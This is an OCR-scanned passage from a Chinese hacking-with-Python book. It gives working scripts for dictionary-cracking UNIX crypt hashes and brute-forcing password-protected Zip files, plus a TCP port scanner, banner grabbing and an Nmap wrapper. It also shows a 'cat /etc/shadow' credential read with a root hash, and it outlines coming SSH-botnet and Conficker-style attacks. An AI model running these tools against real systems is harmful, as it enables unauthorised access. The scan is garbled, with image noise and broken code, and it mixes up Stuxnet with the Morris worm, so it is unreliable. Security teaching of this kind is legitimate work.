Python 编程 语言 的 真正 优势 在 于 其 拥有 大 量 的 标准 库 和 第 三 方 库 。 在 编写 我 们 的 UNIX 
口令 破解 机 时 ， 我 们 需要 使 用 UNIX 计算 口令 hash 的 crypt0 算 法 。 启 动 Python 解释 器 ， 我 们 
看 到 Python 标准 库 中 已 自 带 有 crypt 库 。 要 计算 一 个 加 密 的 UNIX 口令 hash， 只 需 调用 函数 
crypt.crypt()， 并 将 口令 和 salt 作为 参数 传递 给 它 。 该 函数 会 以 字符 串 形式 返回 口令 的 hash. 


wu lion ete hae, art Hal 4 ] 
ee emia | i 4 i 
ABI ppi WASE A | 
"i we y 
天 
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让 我 们 尝试 使 用 crypt0) 函 数 快 速 计算 口令 的 hash。 将 库 导 入 之 后 ， 我 们 将 口令 “egg” 与 
salt"HX" 传 递 给 函数 。 该 函数 返回 口令 的 hash 一 一 字符 串 为 “HX9LLTdc/jiDE”。 成 功 ! W 
在 ， 我 们 可 以 编写 一 个 程序 来 过 历 整个 字典 ， 将 每 一 个 单词 加 上 指定 的 salt 的 计算 结果 都 与 
加 密 的 口令 hash 做 比较 。 


programmer$ python 

>>> import crypt 

>>> crypt.crypt ("egg", "HX") 
'HX9LLTdc/jiDE' 


在 编写 我 们 的 程序 时 ， 首 先 要 创建 两 个 图 数 : main 和 testpass。 根 据 各 目 特 定 的 作用 ， 将 
程序 分 隔 成 相互 独立 的 函数 是 一 个 民 好 的 编程 习惯 。 这 样 便于 我 们 在 最 后 重用 代码 ， 并 使 程 
序 更 易于 阅读 。 我 们 用 main 函数 打开 加 密 口 令 文 件 “password.txt”， 并 逐 行 读 取 口 令 文件 中 
的 内 容 。 每 一 行 中 的 用 户 名 和 口令 hash 都 是 分 隔 开 的 。 对 每 个 口令 hash, main 函数 都 调用 
testPass0) 函 数 ， 演 试用 字典 中 的 单词 破解 它 。 

testPass() 函数 会 以 参数 形式 获得 加 密 的 口令 hash， 并 在 找到 密码 或 搜 遍 字 典 无 果 后 返 
回 。 要 注意 的 是 ， 该 函数 首先 将 加 密 的 口令 hash 的 前 两 个 字符 视 为 salt， 并 提取 出 来 。 然 
后 ， 它 打开 字典 并 遍历 字典 中 的 每 个 单词 ， 用 每 个 单词 和 salt 计算 一 个 新 的 加 密 口 令 hash. 
如 果 计 算 结 果 与 我 们 加 密 口 令 hash 匹配 ， 函 数 会 打印 一 条 消息 显示 找到 密码 ， 并 返回 。 否 
则 ， 它 会 在 词 库 中 继续 对 每 个 单词 进行 测试 。 

import crypt 

| def testPass(cryptPass): 
salt =cryptPass[0:2] 
dictFile =open('dictionary.txt','r') 
for word in dictFile.readlines(): 
word =word.strip('\n') 
cryptWord =crypt.crypt (word, salt) 
if (cryptWord ==cryptPass) : 
print "[+] Found Password: "+word+"\n" 
return 
print "[-] Password Not Found.\n" 


return 
def main(): 


passFile =open('passwords.txt') 
for line in passFile.readlines(): 
Lf Ss * an line: 
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user =line.split(':') [0] 

cryptPass =line.split(':')[1].strip(' ') 
print "{*] Cracking Password For: "+user 
testPass (cryptPass) 


if. Hame S= ™ main “s 


main () 


运行 我 们 的 首 个 程序 后 可 以 看 到 ， 它 虽然 成 功 破解 了 用 户 victim 的 口令 ,但 没有 破解 出 
root 的 密码 。 这 也 表明 ， 系 统管 理 员 (root) 一 定 是 使 用 了 我 们 字典 之 外 的 单词 (作为 口令 
的 ) 。 没 关系 ， 本 书 中 还 会 介绍 其 他 获得 root 权限 的 一 些 方法 。 


“programmer$ python crack.py 
[*] Cracking Password For: victim 
[+] Found Password: egg 
[*] Cracking Password For: root 
[-] Password Not Found. 


在 基于 *Nix 的 现代 操作 系统 中 ，/etc/shadow 文件 中 存储 了 口令 的 hash， 并 能 使 用 更 多 安 
全 的 hash 算法 。 下 面 的 例子 使 用 的 是 SHA-512 hash 算法 。SHA-512 函数 可 以 在 Python 的 
hashlib 库 中 找到 。 你 能 升级 这 个 脚本 ， 使 之 能 破解 SHA-512 hash 吗 ? 

cat /etc/shadow | grep root 


root: $6$ms32yIGNSNyxXj0YofkK14MpRwFHvxQWOyvUid. Slotaxiig2Pu0ggp148/ 
GaGGs5VCngeC.bSOMzTf£/EFS3uspQMNeepIAc. :15503:0:99999:7: 


第 二 个 程序 的 背景 材料 : BRAS 


Peiter“Mudge ”Zatko， 即 传说 中 的 10pht 黑客 ， 现 在 的 美国 国防 部 高 级 研究 计划 局 
(DARPA) ÆR, Æ 2012 年 的 ShmooCon 年 会 上 宣布 他 的 网 络 快速 追踪 计划 (Cyber Fast 
Track program) 时 ， 宣 称 自己 确实 没什么 攻击 性 或 防御 性 的 工具 ， 使 用 的 其 实 都 是 些 简 单 的 
工具 而 已 (Zatko，2012〉。 在 本 书 中 ， 你 可 能 会 发 现 最 开始 的 几 个 示例 脚本 本 质 上 有 些许 攻 
击 性 。 就 拿 刚 才 那 个 破解 UNIX 系统 用 户口 令 的 程序 来 说 吧 ， 攻 击 者 确实 可 以 用 该 工具 获得 
未 经 授权 的 系统 访问 权 ， 那 程序 员 能 否 把 它 好 的 一 面 发 扬 光 大 呢 ? 当然 可 以 一 一 让 我 们 具体 
展开 说 明 。 

Clifford Stoll RA FARKE. HR 19 年 过 去 了 。2007 年 年 初 ， 得 克 萨 斯 州 布朗 斯 
维尔 市 (Brownsvil) 的 消防 部 门 接 到 匿名 举报 ， 称 50 AY John Craig Zimmerman 使 用 单位 的 
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计算 机 浏览 儿童 色情 作品 (Floyd, 2007) 。 布 朗 斯 维尔 市 消防 局 立即 授权 布朗 斯 维尔 市 警察 
局 的 调查 人 员 检 查 Zimmerman 的 工作 电脑 和 移动 硬盘 (Floyd, 2007) 。 和 警察 局 请 来 该 市 的 程 
FF R Albert Castillo 搜查 Zimmerman 电脑 中 的 内 容 (McCullagh，2008) 。Castillo 在 初步 调查 
时 只 发 现 一 些 成 人 色情 图 片 ， 但 没有 涉及 儿童 色情 的 。 

Castillo 继续 浏览 该 文件 时 上 发现 了 一 些 可 疑 文件 ， 其 中 一 个 是 名 为 “Cindy 5” 的 加 密 Zip 
文件 。Castillo 使 用 发 明了 二 十 多 年 的 字典 式 攻击 技术 对 其 进行 解密 ， 结 果 在 解密 的 文件 中 发 
现 了 部 分 裸体 的 未 成 年 人 图 片 (McCullagh，2008) 。 有 了 这 一 证 据 后 ， 法 官 下 达 了 对 
Zimmerman 住所 的 搜查 令 。 在 其 家 中 搜查 人 员 发 现 了 更 多 的 儿童 色情 图 片 (McCullagh, 
2008) 。2007 年 4 月 3 日 ， 一 个 联邦 大 陪审 团 对 John Craig Zimmerman 提起 诉讼 ， 指 控 他 拥 
有 和 制造 儿童 色情 物品 等 四 项 罪名 (Floyd，2007 年 ) 。 

让 我 们 把 在 最 后 一 个 示例 程序 中 学 到 的 口令 骏 力 破解 技术 应 用 到 Zip 文件 上 ， 并 用 这 个 
例子 详细 介绍 编程 的 一 些 基本 概念 。 


第 二 个 程序 : 一 个 Zip 文 件 口令 破解 机 


编写 Zip 文件 口令 破解 机 要 从 学 习 zipfile 库 的 使 用 方法 着 手 。 打 开 Python 解释 器 ， 我 们 
用 help('zipfile") 命 令 进 一 步 了 解 这 个 库 ， 并 重点 看 一 下 ZipFile 类 中 的 extractall0) 方 法 。 这 个 类 
和 这 个 方法 对 我 们 编程 破解 有 口令 保护 的 Zip 文件 是 很 有 用 的 。 请 注意 extractall0 方 法 用 可 选 
参数 指定 密码 的 方式 。 


programmer$ python 
Python 2.7.1 (r271:86832, Jun 16 2011, 16:59:05) 
Type "help", "copyright", "credits" or "license" for more information. 
>>> help('zipfile') 
<. SNIPPED. .> 
class ZipFile 
| Class with methods to open, read, write, close, list zip 
files. 
| 
| z =ZipFile(file, mode="r", compression=ZIP_STORED, 
allowZip64=False) | 
<..SNIPPED..> 
| extractall(self, path=None, members=None, pwd=None) 
| Extract all members from the archive to the current 
working 
| directory. "path' specifies a different directory to 
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extract to. 
| 'members' is optional and must be a subset of the list 
Returned 


让 我 们 快速 编写 一 个 脚本 来 测试 一 下 Zip 文件 库 的 用 法 。 导 入 库 后 ， 用 带 有 口令 保护 的 
Zip 文件 的 文件 名 ， 实 例 化 一 个 新 的 ZipFile 类 。 要 解压 这 个 Zip 文件 ， 我 们 使 用 extractall() 方 
法 ， 并 在 可 选 参 数 pwd 上 填 入 口令 。 

import zipfile 

zFile = zipfile.ZipFile("evil.zip") 

zFile.extractall (pwd="secret") 

接 下 来 ， 我们 要 执行 脚本 以 确保 其 正常 运行 。 注 意 ， 在 执行 前 ， 我 们 当前 的 工作 目录 下 
只 有 脚本 和 Zip 文件 。 执 行 脚本 后 ， 它 会 将 evil.zip 的 内 容 解 压 到 一 个 名 为 evil/ 的 新 创建 的 目 
录 中 ， 该 目录 包含 有 口令 保护 的 Zip 文件 中 的 文件 。 


programmer$ ls 

evil.zip unzip.py 
programmer$ python unzip.py 
programmers ls 

evil.zip unzip.py evil 
programmer$ cd evil/ 
programmer$S ls 
note to adam.txt apple.bmp 


如 果 用 一 个 错误 密码 执行 这 个 脚本 会 发 生 什么 情况 ?让 我 们 在 脚本 中 增加 一 些 捅 获 和 处 
理 异 常 的 代码 ， 显 示 错 误 的 信息 。 


import zipfile 
zFile =zipfile.ZipFile("evil.zip") 
try: 

zFile.extractall (pwd="oranges") 
except Exception, e: 

print e 


用 错误 的 口令 执行 脚本 后 ， 我 们 看 到 打印 出 了 一 条 错误 信息 ， 指 明 用 户 使 用 了 错误 的 密 
码 口 令 去 解密 /加 密 的 Zip 文件 。 


programmer$ python unzip.py 
(‘Bad password for file', <zipfile.ZipiInfo object at 0x10a859500>) 


我 们 可 以 用 因 口 令 不 正确 而 抛 出 的 异常 来 测试 我 们 的 字典 文件 〈《 即 代码 中 的 
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dictionary.txt) 中 是 否 有 Zip 文件 的 口令 。 实 例 化 一 个 ZipFile 类 之 后 ， 我 们 打开 字典 文件 ， 遍 
历 并 测试 字典 中 的 每 个 单词 。 如 果 extractall0 函 数 的 执行 没有 出 错 ， 则 打印 一 条 消息 ， 输 出 正 
确 的 口令 。 但 是 ， 如 果 extractall0) 函 数 抛 出 了 一 个 口令 错误 的 异常 ， 就 忽略 这 个 异常 ， 并 继续 
测试 字典 中 的 下 一 个 口令 。 


. a 7 
it i Akil) 
al ` an) Tet oy re iLL 
(i ni eet ea ee fa wy write ‘= | | Nees 
Ul | mel 4 tl! - ell I| Wa | (dl) 外 二 
sh | ay” P. be a H T ot Wl 
re iy NRT ns Re s, ` ie { 
7 ‘ AD NT wa yi 


执行 这 个 脚本 后 ， 我 们 可 以 看 到 它 正 确 地 识别 出 了 有 口令 保护 的 Zip 文件 的 口令 。 


现在 再 来 清理 一 下 我 们 的 代码 。 我 们 要 用 函数 模块 化 脚本 ， 而 非 线性 执行 的 程序 。 
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在 将 程序 模块 化 成 分 离 函数 后 ， 我 们 现在 还 能 去 提高 性 能 。 我 们 可 以 利用 线程 同时 测试 
多 个 口令 ， 而 不 是 只 能 逐个 测试 词 库 中 的 单词 。 对 词 库 中 的 每 个 单词 ， 我 们 都 会 生成 一 个 新 
的 线程 去 测试 它 。 


i 8 . - 
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现在 ， 我 们 还 要 把 脚本 修改 一 下 ， 使 用 户 可 以 指定 要 破解 的 Zip 文件 的 文件 名 和 字典 文 
件 的 文件 名 。 要 做 到 这 一 点 ， 需 要 导入 optparse 库 ， 第 2 章 会 更 详细 地 介绍 这 个 库 。 对 现在 
这 个 脚本 所 要 实现 的 东西 ， 我 们 要 知道 它 是 用 于 解析 下 面 脚本 的 标志 和 可 选 参数 的 。 在 zip- 
file-cracker 脚本 中 ， 我 们 将 添加 两 个 强制 性 flags—zip 文件 名 和 字库 名 。 
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pass 
def main(): 


parser =optparse.OptionParser("usage%prog "+\ 
"-f <zipfile> -d <dictionary>") 
| parser.add option('-f', dest='zname', type='string',\ 
help='specify zip file’) 
| parser.add option('-d', dest='dname', type='string', \ 
help='specify dictionary file') 
(options, args) =parser.parse args () 
if (options.zname == None) | (options.dname == None): 
print parser.usage 


exit (0) 
else: 


zname = options. zname 
dname = options.dname 
zFile = zipfile.ZipFile (zname) 
passFile = open (dname) 
for line in passFile.readlines(): 
password =line.strip('\n") 


t =Thread(target=extractFile, args=(zFile, password) ) 
t.start () 
E>) ames a See ee 
main () 


最 后 ， 带 口令 保护 的 zip-file-cracker 脚本 完工 了 ， 我 们 还 要 对 它 进行 测试 。 这 个 脚本 只 要 
E 35 行 代码 就 够 了 ! 


programmer$ python unzip.py -f evil.zip -d dictionary.txt 
[+] Found password secret 


ASE N\E5 


在 这 一 章 里 ， 我 们 通过 编写 一 个 简单 的 漏洞 扫描 器 ， 简 要 介绍 了 Python 的 标准 库 和 一 些 
内 置 模块 。 接 下 来 ， 我 们 又 进一步 编写 了 入 门 的 两 个 Python 程序 一 一 一 个 20 年 前 的 UNIX O 
令 破 解 机 和 一 个 Zip 文件 口令 暴力 破解 机 。 你 现在 已 经 具备 编写 自己 的 脚本 的 初步 技能 了 。 
希望 接 下 来 的 内 容 也 与 本 章 一 样 精彩 。 我 们 将 从 介绍 如 何在 渗透 测试 中 使 用 Python 攻击 系统 
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切入 ， 开 始 我 们 的 缤纷 之 旅 。 
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本 章 简介 : 

© 编写 一 个 端口 扫描 器 

。 构建 一 个 SSH 僵尸 网 络 

。 通过 FTP 批量 抓 取 “ 肉 机 ” 
e 重 现 “Conficker” 病 毒 

。 你 自己 的 Oday 攻击 脚本 


要 成 为 一 名 武士 并 非 只 要 有 梦想 就 可 以 。 它 是 一 个 生命 不 息 、 奋 斗 不 止 的 
历程 。 没 有 天 生 的 武士 ， 也 没 人 生来 平凡 ， 是 我 们 自己 成 就 了 自己 。 


— (os) AXA, BA, 1914 


引言 : Morris 蠕 虫 现在 还 有 用 吗 


22 年 前 ，StuxNet 蠕虫 病毒 重创 了 位 于 Bushehr 和 Natantz 的 伊朗 核电 厂 (Albright， 
Brannan, & Walrond, 2010) 。 它 是 世界 上 的 第 一 个 数字 武器 ， 出 自 康 奈 尔 大 学 一 名 研究 生 
(Robert Tappen Morris Jr， 美 国 国家 安全 局 国家 计算 机 安全 中 心 负责 人 的 儿子 ) 之 手 。 以 他 的 
名 字 命 名 的 这 个 病毒 感染 了 6000 台 工 作 站 (Elmer-Dewitt, McCarroll, & Voorst，1988) 。 虽 
然 按 今 天 的 标准 ，6000 台 工 作 站 似乎 显得 微不足道 ， 但 在 1988 年 ， 这 个 数字 却 是 互联 网 上 计 
算 机 总 量 的 近 一 成 。 据 美国 政府 相关 部 门 的 粗略 估计 ， 为 了 消除 Morris 蠕虫 留 下 的 损害 ， 花 
费 了 1 千 万 至 1 亿美 元 的 经 费 (GAO, 1989) 。 那 么 问题 来 了 : 这 个 病毒 是 怎么 工作 的 ? 

Morris 晴 虫 病毒 使 用 了 一 个 三 管 齐 下 的 攻击 方式 入 侵 系统 。 它 首先 利用 了 UNIX 邮件 发 
送 程序 中 的 漏洞 。 其 次 ， 它 利用 UNIX 系统 的 finger 守护 进程 中 的 一 个 独立 的 漏洞 。 最 后 ， 
它 会 用 一 些 常见 的 用 户 名 /密码 ， 尝 试 连接 那 些 使 用 RSH (remote shell， 远 程 shell) 协议 的 目 


1 夏目 激 石 ， 日 本 近代 作家 ， 在 日 本 近代 文学 史上 享有 很 高 的 地 位 ， 被 称 为 “国民 大 作家 ”。 一 一 译 者 注 
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标 主机 。 只 要 三 个 攻击 中 的 任何 一 个 成 功 ， 晴 虫 就 会 执行 一 个 小 程序 ， 下 载 并 执行 病毒 的 其 
余部 分 (Eichin & Rochlis, 1989) 。 

今天 类 似 的 攻击 是 否 还 会 发 生 ? 我 们 能 和 否 也 学 会 写 点 类 似 的 程序 呢 ? 我 们 以 这 些 问 题 为 
基础 展开 本 章 。Morris 中 的 大 部 分 攻击 代码 都 是 用 C 语言 编写 的 。 尽 管 C 是 一 种 非常 强大 的 
语言 ， 但 它 也 相当 难 学 。 与 之 形成 鲜明 对 比 的 是 : Python 编程 语言 拥有 用 户 友好 的 语法 和 大 
量 的 第 三 方 模块 。 它 提供 了 一 个 更 好 的 支撑 平台 ， 能 明显 平缓 大 多 数 程序 员 初 学 攻击 技术 时 
的 学 习 曲 线 。 在 接 下 来 的 内 容 中 ， 我 们 将 用 Python EI Morris 晴 虫 的 部 分 功能 及 一 些 现 代 的 
攻击 方法 (attack vector) 。 


$35 — “Pino FFs ae 


任何 一 个 靠 谱 的 网 络 攻 击 都 是 起 步 于 侦查 的 。 攻 击 者 必须 在 挑选 并 确定 利用 目标 中 的 漏 
洞 之 前 找 出 目标 在 哪里 有 漏洞 。 在 本 节 中 ， 我 们 将 编写 一 个 扫描 目标 主机 开放 的 TCP 端口 的 
侦查 小 脚本 。 当 然 ， 为 了 与 TCP 端口 进行 交互 ， 我 们 先 要 建立 TCP 套 接 字 。 

与 大 多 数 现 代 编 程 语 言 一 样 ，Python. 也 提供 了 访问 BSD 套 接 字 的 接口 。BSD 套 接 字 提供 
了 一 个 应 用 编程 接口 (API) ， 使 程序 员 能 编写 在 主机 之 间 进 行 网 络 通信 的 应 用 程序 。 通 过 一 
系列 的 套 接 字 API 函数 ， 我 们 可 以 创建 、 绑 定 、 监 听 、 连 接 ， 或 在 TCP/IP 套 接 字 上 发 送 数 
据 。 在 这 一 点 上 ， 为 了 进一步 开发 我 们 目 己 的 攻击 程序 ， 必 须 对 TCP/IP 套 接 字 有 一 个 更 深入 
的 了 解 。 

大 多 数 能 访问 互联 网 的 应 用 使 用 的 都 是 TCP 协议 。 例 如 ， 在 目标 组 织 中 ，Web 服务 器 可 
能 位 于 TCP 80 端口 ， 电 子 邮 件 服务 器 在 TCP 25 端口 ，FTP 服务 器 在 TCP 21 端口 。 要 连接 目 
标 组 织 中 的 任 一 服务 器 ， 攻 击 者 必须 知道 与 服务 器 相关 联 的 IP 地 址 和 TCP 端口 。 虽 然 熟 悉 我 
们 目标 组 织 的 人 可 能 掌握 这 些 信息 ， 但 攻击 者 却 不 一 定 。 

所 有 成 功 的 网 络 攻 击 一 般 都 是 以 端口 扫描 拉 开 序幕 的 。 有 一 种 类 型 的 端口 扫描 会 向 一 系 
列 常用 的 端口 发 送 TCP SYN 数据 包 ， 并 等 待 TCP ACK 响应 一 一 这 能 让 我 们 确定 这 个 端口 是 
开放 的 。 与 此 相反 ，TCP 连接 扫描 是 使 用 完整 的 三 次 握手 来 确定 服务 器 或 端口 是 否 可 用 的 。 





TCP 全 连接 扫 摘 


开始 编写 我 们 自己 的 用 TCP 全 连接 扫描 来 识别 主机 的 TCP 端口 扫描 器 吧 。 开 始 前 ， 我 们 
要 导入 Python 的 BSD 套 接 字 API 实现 。 套 接 字 API 会 为 我 们 提供 一 些 在 实现 TCP 端口 扫描 
程序 时 有 用 的 函数 。 开 始 前 让 我 们 先 来 检查 一 个 配对 。 要 想 更 深入 地 了 解 Python 标准 库 文 
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请 查看 : http://docs.Python.org/library/socket.html。 


socket.gethostbyname (hostname) “C This function takes a hostname such 
as www.syngress.com and returns an IPv4 address format such as 
69.163.177.2. 

socket.gethostbyaddr(ip address) “C This function takes an IPv4 address 
and returns a triple containing the hostname, alternative list of 
host names, and a list of IPv4/v6 addresses for the same interface 
on the host. 

socket.socket (\[family\[, type\[, proto]]]) “C This function creates an 
instance of a new socket given the family. Options for the socket 
family are AF INET, AF INET6, or AF UNIX. Additionally, the socket 
can be specified as SOCK_STREAM for a TCP socket or SOCK DGRAM for 
a UDP socket. Finally, the protocol number is usually zero ear is) 
omitted in most cases. 

socket.create connection (address\[, timeout\[, source address]]) “C This 
function takes a 2-tuple (host, port) and returns an instance of a 
network socket. Additionally, it has the option of taking a timeout 
and source address. 


为 了 更 好 地 了 解 TCP 端口 扫描 器 的 工作 原理 ， 我 们 将 脚本 分 成 五 个 独立 的 步骤 ， 分 别 为 


它们 编写 Python 代码 。 首 先 ， 输 入 一 个 主机 名 和 用 逗号 分 隔 的 端口 列表 ， 并 了 予以 扫描 。 接 下 


来 ， 将 主机 名 转换 成 IPv4 互联 网 地 址 。 对 列表 中 的 每 个 端口 ， 我 们 都 会 连接 目标 地 址 和 该 端 
口 。 最 后 ， 为 了 确定 在 该 端口 上 运行 的 是 什么 服务 ， 我 们 将 发 送 垃圾 数据 并 读 取 由 具体 应 用 
发 回 的 Banner。 


在 第 一 步 中 ， 我 们 从 用 户 那 里 获得 主机 名 和 端口 。 为 了 做 到 这 一 点 ， 我 们 在 程序 中 使 用 


optparse 库 解 析 命 令 行 参 数 。 调 用 optparse.OptionPaser ([usage aL aiai an 


AS 


(option parser) 类 的 实例 。 接 着 ， 在 parser.add option 中 指定 这 个 脚本 具体 要 解析 哪个 命 


令 行 参数 。 下 面 的 例子 显示 了 一 个 快速 解析 要 扫描 的 目标 主机 名 和 端口 的 方法 。 


import optparse 

parser =optparse.OptionParser('usage %prog -H'+\ 
‘<target host> -p <target port>'") 

parser.add option('-H', dest='tgtHost", type='string', \ 
help='specify target host') 

parser.add option('-p', dest='tgtPort', type='int', \ 
help='specify target port") 

(options, args) =parser.parse args () 

tgtHost =options.tgtHost 

tgtPort =options.tgtPort 

if (tgtHost == None) | (tgtPort == None): 
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接 下 来 ， 我 们 要 生成 两 个 函数 ， connScan 和 portScan。portScan 函数 以 参数 的 形式 接收 主 
机 名 和 目标 端口 列表 。 它 首先 会 尝试 用 gethostbyname0 函 数 确定 主机 名 对 应 的 地 址 。 接 下 
来 ， 它 会 使 用 connScan 函数 输出 主机 名 (BR IP 地 址 ) ， 并 使 用 connScan() 函 数 尝试 逐个 连接 
我 们 要 连接 的 每 个 端口 。connScan 函数 接收 两 个 参数 ，tgtHost 和 tgtPort， 它 会 去 尝试 建立 与 
目标 主机 和 端口 的 连接 。 如 果 成 功 ，connScan 将 打印 出 一 个 端口 开放 的 消息 。 如 果 不 成 功 ， 
它 会 打印 出 端口 关闭 的 消息 。 





抓 取 应 用 的 Banner 


p 


, 


为 了 抓 取 目标 主机 上 应 用 的 Banner， 我 们 必须 先 在 connScan 函数 中 插入 一 些 新 增 的 代 
码 。 找 到 开放 的 端口 后 ， 我 们 向 它 发 送 一 个 数据 串 并 等 待 响 应 。 跟 进 收集 到 的 响应 ， 我 们 就 
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能 推断 出 在 目标 主机 和 端口 上 运行 的 应 用 。 
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exit (0) 
portScan(tgtHost, tgtPorts) 
pe A Siete Ai eo EI 
oii pia ht) i 


例如 ， 扫 描 一 台 安 装 了 FreeFloat FTP 的 服务 器 ， 就 能 在 抓 取 到 的 Banner 中 获得 以 下 信 


attacker$ python portscanner.py -H 192.0168'.1u. 377 =p 21, Ay: 80 
[+] Scan Results for: 192. 168.1.37 | 
Scanning port 21 
[+] 21/tep open 
- [+] 220 FreeFloat Ftp Server (Version 1.00). 
现在 我 们 知道 服务 器 上 运行 的 是 FreeFloat FTP (版 本 1.00) ， 了 解 这 一 点 有 助 于 我 们 之 
后 的 靶 标 应 用 。 


线程 扫 摘 


根据 套 接 字 中 timeout 变量 的 值 ， 每 扫描 一 个 套 接 字 都 会 花费 几 秒 钟 。 这 看 上 去 似乎 微 不 
足 道 ， 但 如 果 我 们 要 扫描 多 个 主机 或 端口 ， 时 间 总 量 就 会 成 倍增 加 。 理 想 情况 下 ， 我 们 希望 
能 同时 扫描 多 个 套 接 字 ， 而 不 是 一 个 一 个 地 进行 扫描 。 这 时 ， 我 们 必须 引入 Python 线程 ， 线 
程 是 一 种 能 提供 这 类 同时 执行 多 项 任务 的 方法 。 具 体 到 我 们 这 个 扫描 器 ， 我 们 要 修改 的 是 
portScan0 函 数 中 友 代 循环 里 的 代码 。 请 注意 我 们 是 如 何 把 connScan 函数 作为 线程 来 调用 的 。 
这 样 ， 迭 代 中 创建 的 每 个 线程 就 能 同时 执行 

for tgtPort in tgtPorts: 

ia a args=(tgtHost, int (tatPort))) 
O als oh A E | 3 

这 让 我 们 的 速度 有 了 显著 提升 ， 但 这 又 有 一 个 缺点 。connScan0 函 数 会 在 屏幕 上 打印 一 个 
输出 。 如 果 多 个 线程 同时 打印 输出 ， 就 可 能 会 出 现 乱码 和 失 序 。 为 了 让 一 个 函数 获得 完整 的 
屏幕 控制 权 ， 我 们 需要 使 用 一 个 信号 量 (semaphore) 。 一 个 简单 的 信号 量 就 能 阻止 其 他 线程 
运行 。 注 意 ， 在 打印 输出 前 ， 我 们 用 screenLock.acquire0 执 行 一 个 加 锁 操 作 。 如 果 信 号 量 还 没 
被 锁 上 ， 线 程 就 有 权 继 续 运行 ， 并 输出 打印 到 屏幕 上 。 如 果 信 和 号 量 已 经 被 锁定 ， 我 们 只 能 等 
待 ， 直 到 持 有 信号 量 的 线程 释放 信号 量 。 通 过 利用 信号 量 ， 我 们 现在 能 够 确保 在 任何 给 定 的 
时 间 点 上 只 有 一 个 线程 可 以 打印 屏幕 。 在 异常 处 理 代 码 中 ， 位 于 finally 关键 字 前 面 的 是 在 终 
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止 阻塞 (其 他 线程 ) 之 前 需要 执行 的 代码 。 


把 其 他 所 有 的 函数 放 入 同一 个 脚本 中 ， 并 添加 一 些 参数 解析 代码 ， 这 就 有 了 我 们 最 终 的 
端口 扫描 器 脚本 。 
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针对 某 个 目标 运行 脚本 ， 我 们 看 到 它 有 一 个 Xitami FTP 服务 器 运行 在 TCP 21 端口 上 ， 
同时 TCP 1720 端口 是 关闭 的 。 


使 用 NMAP 端 口 扫描 代码 


前 面 的 例子 是 快速 编写 能 进行 TCP 连接 扫描 的 一 个 脚本 。 这 可 能 还 不 够 用 ， 因 为 我 们 可 
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能 还 要 进行 其 他 类 型 的 扫描 ， 例 如 ， 由 Nmap 工具 包 (Vaskovich, 1997) 提供 的 ACK, 
RST、FIN 或 SYN-ACK 扫描 等 。 实 际 的 工业 标准 一 一 Nmap 端口 扫描 工具 包 提 供 了 大 量 的 功 
能 。 这 也 引出 了 一 个 问题 ， 为 什么 不 直接 使 用 Nmap? 这 就 是 Python 真正 美妙 的 地 方 。 虽 然 
Fyodor Vaskovich 编写 的 Nmap 中 也 能 使 用 C 和 Lua 编写 的 脚本 ， 但 是 Nmap 还 能 被 非常 好 地 
整合 到 Python 中 。Nmap 可 以 生成 基于 XML 的 输出 。Steve Milner 和 Brian Bustin 编写 的 
Python 库 能 够 解析 这 类 基于 XML 的 输出 。 这 让 我 们 能 在 Python 脚本 中 使 用 Nmap 的 全 部 功 
能 。 在 开始 编写 之 前 ， 你 必须 安装 Python - Nmap (可 至 http://xael.org/norman/python/python- 
nmap/ 下 载 ) ， 安 装 时 请 注意 开发 者 对 Python 3.x 和 Python 2.x 不 同 版 本 的 注意 事项 提醒 。 


更 多 信息 多 信息 


其 他 端口 扫描 类 型 


还 有 一 些 其 他 类 型 的 扫描 。 虽 然 我 们 现在 还 没有 定制 一 些 特殊 的 TCP 数据 包 的 工具 ， 这 个 问 
题 将 在 第 5 章 介 绍 。 到 时 你 可 选择 把 相关 代码 复制 到 你 的 端口 扫 摘 器 的 代码 中 ， 以 实现 以 下 类 型 
的 扫描 。 

TCP SYN SCAN 一 一 也 称 为 半 开 放 扫 描 ， 这 种 类 型 的 扫描 发 送 一 个 SYN 包 ， 启 动 一 个 TCP 会 
话 ， 并 等 待 响应 的 数据 包 。 如 果 收 到 的 是 一 个 reset 包 ， 表 明 端 口 是 关 闭 的 ， 而 如 果 收 到 的 是 一 个 
SYN/ ACK 包 ， 则 表示 相应 的 端口 是 打开 的 。 

TCP NULL SCAN 一 一 NULL 扫描 把 TCP 头 中 的 所 有 标志 位 都 设 为 NULL。 如 果 收 到 的 是 一 个 
RST 包 ， 则 表示 相应 的 端口 是 关闭 的 。 

TCP FIN SCAN——TCP FIN 扫描 发 送 一 个 表示 拆除 一 个 活动 的 TCP 连接 的 FIN 包 ， 让 对 方 
关闭 连接 。 如 果 收 到 了 一 个 RST 包 ， 则 表示 相应 的 端口 是 关闭 的 。 

TCP XMAS SCAN——TCP XMAS 扫描 发 送 PSH、FIN、URG 和 TCP 标志 位 被 设 为 1 的 数据 
包 。 如 果 收 到 了 一 个 RST 包 ， 则 表示 相应 的 端口 是 关闭 的 。 


安装 好 Python-Nmap 之 后 ， 我 们 就 可 以 将 Nmap 导入 到 现 有 的 脚本 中 ， 并 在 你 的 Python 
脚本 中 直接 使 用 Nmap 扫描 功能 。 创 建 一 个 PortScanner() 类 对 象 ， 这 使 我 们 能 用 这 个 对 象 完 成 
扫描 操作 。PortScanner 类 有 一 个 scan() 函 数 ， 它 可 将 目标 和 端口 的 列表 作为 参数 输入 ， 并 对 
它们 进行 基本 的 Nmap 扫描 。 另 外 ， 我 们 还 可 以 把 目标 主机 的 地 址 /端口 放 入 数组 中 备查 ， 并 
打印 出 端口 的 状态 。 在 接 下 来 的 部 分 中 ， 我 们 将 依靠 该 功能 来 定位 和 识别 目标 。 


import nmap 
import optparse 


37 


Python 绝技 : 运用 Python 成 为 顶级 黑客 


def nmapScan(tgtHost, tgtPort): 
nmScan =nmap. PortScanner () 
nmScan.scan (tgtHost, tgtPort) 
state=nmScan[tgtHost] ['tcp’ | {int tt de rósti i) state'] 
prine Pleo “rt gthosh. ktep Tregt ort + "Fatare 
def main(): | 
parser =optparse.OptionParser('usage%tprog '+\ 
'-H <target host> -p <target port>') 
parser.add option('-H', dest='tgtHost', type='string', \ 
help='specify target host") 
parser.add option('-p', dest='tgtPort', type='string’, \ 
help='specify target port[s] separated by comma") 
(options, args) =parser.parse args () 
tgtHost =options.tgtHost 
tgtPorts =str(options.tgtPort).split(', ") 
if (tgtHost ==None) | (tgtPorts[0]) = None): 
print parser.usage 
exit (0) 
for tgtPort in tgtPorts: 
nmapScan(tgtHost, tgtPort) 
if cname =e maine ts 
main () 


运行 这 个 使 用 了 Nmap 的 脚本 ， 我 们 注意 到 TCP 1720 端口 的 一 些 有 趣 现象 。 服 务 器 或 防 
